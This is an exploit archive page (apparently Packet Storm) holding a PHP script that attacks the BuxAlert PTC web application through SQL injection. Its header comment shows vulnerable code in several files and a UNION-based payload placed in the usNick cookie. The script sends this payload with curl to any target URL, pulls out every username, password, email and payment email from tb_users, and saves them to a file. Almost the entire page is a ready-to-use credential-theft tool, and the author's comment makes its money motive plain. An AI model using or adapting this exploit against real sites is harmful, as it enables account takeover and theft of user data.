exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BuxAlert PTC SQL Injection

BuxAlert PTC SQL Injection
Posted Dec 16, 2013
Authored by i-Hmx

BuxAlert PTC remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | fbd5da25bbec72925f7c66ded242e6c814ba92d70712e3aca5b01fb09b153928

BuxAlert PTC SQL Injection

Change Mirror Download
<?
/*
[+] BuxAlert PTC
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] n0p1337@gmail.com
[+] sec4ever.com , 1337s.cc


I.Sql Injection Vuln
/referals.php > Inject in cookiws usNick
usNick=i-Hmx'/*! union all select 1,(select group_concat(username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337


require('config.php');
$lole=$_COOKIE["usNick"];
$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");
mysql_close($con);
while ($row = mysql_fetch_array($tabla)) {

sendsms.php , surf.php , almost all php files are cookies injectable under cookie value usNick

/messenger.php?option=delete&id=1%injecthere%

if ($option=="delete"){
require ('config.php');
//Todo parece correcto procedemos con la inserccion
$queryz = "DELETE FROM tb_messenger WHERE id='$id' LIMIT 1";
mysql_query($queryz) or die(mysql_error());
mysql_close($con);
echo "<font color=\"#cc0000\"><b>Message has been deleted.</b></font><br><br>";
}


/purchase.php
if (isset($_POST["customer"]))
{
$refset=$_POST["refset"];
require('config.php');
$queryx = mysql_query("SELECT sets FROM tb_buyref WHERE id='1' and refnum='$refset'") or die(mysql_error());


Fuck Injection , it's all abt money anyway :D
You can control ay user via usNick cookie value

*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/bux/\n";
exit();
}
echo "[+] Bux Alert Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function faexploit($url){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."referals.php");
curl_setopt($curl,CURLOPT_COOKIE,"usNick=i-Hmx'/*! union all select 1,(select group_concat(0x666172736177797e,username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18*/ and 'faris'='1337");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$kaf=faexploit($argv[1]);
if(preg_match("/farsawy/",$kaf)){
$fadata= kastr($kaf,"<tr><td align='center'>","</td><td align='center'>");
$kdata=str_replace("farsawy~","",$fadata);
$kadata=str_replace(",","",$kdata);
@unlink("result.htm");
$res=fopen("result.htm","w+");
fwrite($res,"| BuxAlert Sql Injection Vuln<br>| Exploited By i-Hmx<br>| sec4ever.com , 1337s.cc<br>-----------------------------------<br><br>User -- Password ---- Email ---- Paying email<br>".$kadata."<br>------------i-Hmx----------");
echo "[-] Result have been written to result.htm\n";
echo "[+] Done";
}
else
{
echo "[-] Not vulnerable";
}
?>
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close